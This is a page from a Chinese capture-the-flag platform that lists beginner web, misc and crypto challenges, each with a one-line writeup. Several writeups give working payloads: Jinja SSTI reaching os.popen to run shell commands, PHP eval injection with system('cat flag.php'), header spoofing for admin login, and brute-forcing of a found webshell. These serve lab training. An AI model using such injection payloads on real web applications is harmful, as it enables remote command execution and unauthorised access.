返回

列表

类型:
标签:
排序:
为你找到 340 个题目。

1. [平台] 签到题

分数: 5 金币: 10 已通过

通过: 44871 标签: 平台 MISC

writeup: 扫码关注

68. [平台] 滑稽

分数: 10 金币: 1 已通过

通过: 29131 标签: 平台 WEB

writeup: 查看源码,搜索flag

69. [平台] 计算器

分数: 10 金币: 1 已通过

通过: 28941 标签: 平台 WEB

writeup: 修改input maxlength

70. [平台] GET

分数: 10 金币: 1 已通过

通过: 28045 标签: 平台 WEB

writeup: /?what=flag

196. [平台] Simple_SSTI_1

分数: 5 金币: 2 已通过

通过: 27864 标签: 平台 WEB

writeup: /?flag={{config}}

71. [平台] POST

分数: 10 金币: 1 已通过

通过: 23609 标签: 平台 WEB

writeup: curl -d what=flag http://ip:port/

72. [平台] 矛盾

分数: 10 金币: 1 已通过

通过: 21507 标签: 平台 WEB

writeup: /?num=1a

74. [平台] 你必须让他停下

分数: 10 金币: 1 已通过

通过: 20838 标签: 平台 WEB

writeup: 不停curl,知道出现10.jpg,flag就显示了

73. [平台] alert

分数: 10 金币: 1 已通过

通过: 19851 标签: 平台 WEB

writeup: 查看源码,复制那一串unicode字符串,用站长工具-unicode编码转换解码

2. [平台] 这是一张单纯的图片

分数: 10 金币: 1 已通过

通过: 18394 标签: 平台 MISC

writeup: strings file.jpg 提取最后一行unicode字符串,解码

203. [平台] Simple_SSTI_2

分数: 10 金币: 3 已通过

通过: 14983 标签: 平台 WEB

writeup: SSTI模版注入: /?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}, 再 /?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

78. [平台] 网站被黑

分数: 15 金币: 2 已通过

通过: 14950 标签: 平台 WEB

writeup: dirsearch 扫出来shell.php,再密码爆破,得到hack

188. [平台] 社工-进阶收集

分数: 10 金币: 3 已通过

通过: 14902 标签: 平台 MISC

writeup: 查看

77. [平台] 头等舱

分数: 15 金币: 1 已通过

通过: 14897 标签: 平台 WEB

writeup: curl -I http://114.67.175.224:10352/

75. [平台] eval

分数: 15 金币: 1 已通过

通过: 14120 标签: 平台 WEB

writeup: 解法一:/?hello=file('flag.php') 解法二:/?hello=system('cat flag.php') 解法三:/?hello=show_source('flag.php')

47. [平台] 聪明的小羊

分数: 10 金币: 1 已通过

通过: 13912 标签: 平台 Crypto

writeup: 栅栏编码,栏位为2,解码后 flag{6fde4163df05d900}

3. [平台] 隐写

分数: 10 金币: 1 已通过

通过: 13131 标签: 平台 MISC

writeup: hex friend 打开图片,修改高度,A4=>F4,可打开;或者程序检测crc,恢复高度

46. [平台] /.-

分数: 10 金币: 1 已通过

通过: 12750 标签: 平台 Crypto

writeup: 摩斯电码先解密,得到FLAG%u7bD3FCBF17F9399504%u7d,%u替换成%,url解码,再转为小写,得到flag

79. [平台] 本地管理员

分数: 15 金币: 2 已通过

通过: 12497 标签: 平台 WEB

writeup: 页面源码,dGVzdDEyMw==,base64解码得到test123,hackbar提交,新增header,X-Forwarded-For: 127.0.0.1 ,payload pass=test123&user=admin

76. [平台] 变量1

分数: 15 金币: 1 已通过

通过: 12355 标签: 平台 WEB

writeup: 解法一:/?args=GLOBALS

上一页

第 1 页